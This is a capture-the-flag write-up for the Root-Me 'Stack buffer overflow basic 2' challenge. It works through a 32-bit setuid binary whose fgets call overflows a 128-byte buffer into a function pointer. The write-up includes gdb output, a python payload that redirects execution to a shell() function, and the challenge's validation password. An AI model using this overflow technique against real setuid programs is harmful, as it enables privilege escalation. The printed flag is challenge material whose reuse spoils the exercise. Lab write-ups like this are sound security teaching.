# [root-me.org/App-System] ELF x86 - Stack buffer overflow basic 2

## Challenge config
```
Host	challenge02.root-me.org
Protocol	SSH
Port	2222
SSH access	ssh -p 2222 app-systeme-ch15@challenge02.root-me.org
Username	app-systeme-ch15
Password	app-systeme-ch15
```

## Examine
- Access to server. Challenge info:
```
/tmp and /var/tmp are writeable

Validation password is stored in $HOME/.passwd

...

./ch15: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib, for GNU/Linux 3.2.0, BuildID[sha1]=3903efc03e76befbe70379d744ba08893fc04c1d, not stripped
libc: GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   ./ch15

ASLR is OFF
```
- Run:
```
./ch15
abc
Hey dude ! Waaaaazzaaaaaaaa ?!

./ch15
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Hey dude ! Waaaaazzaaaaaaaa ?!
```

- View source:
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void shell() {
    setreuid(geteuid(), geteuid());
    system("/bin/bash");
}

void sup() {
    printf("Hey dude ! Waaaaazzaaaaaaaa ?!\n");
}

void main()
{ 
    int var;
    void (*func)()=sup;
    char buf[128];
    fgets(buf,133,stdin);
    func();
}
```
The code is clear. Currently the function pointer `func` is assigned to a function `sup()` which just prints out a stupid string. What we want is the function named `shell()` which will open the shell. Below the program allows us to interfere by input from a `buf` which is 128-byte length => buffer overflow exploit goes here.

## Exploit
Firstly, notice that the call `fgets(buf, 133, stdin)` allows us to input 133 bytes, which overflow the size of `buf`. Secondly, to make the function pointer `func` points to `shell()`, we must know the address of `shell()` function.

Open the program with **gdb**:
```
Reading symbols from ./ch15...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048593
(gdb) r
Starting program: /challenge/app-systeme/ch15/ch15 

Breakpoint 1, 0x08048593 in main ()
(gdb) info address shell
Symbol "shell" is at 0x8048516 in a file compiled without debugging.
```

So we know the address of `shell()` is *0x8048516*. It's time to exploit the buffer:
```
$ python -c 'print "A"*128+"\x16\x85\x04\x08"' > /tmp/temp.txt
$ cat /tmp/temp.txt - | ./ch15
cat .passwd
B33r1sSoG0oD4y0urBr4iN
```

Done! Password is `B33r1sSoG0oD4y0urBr4iN`.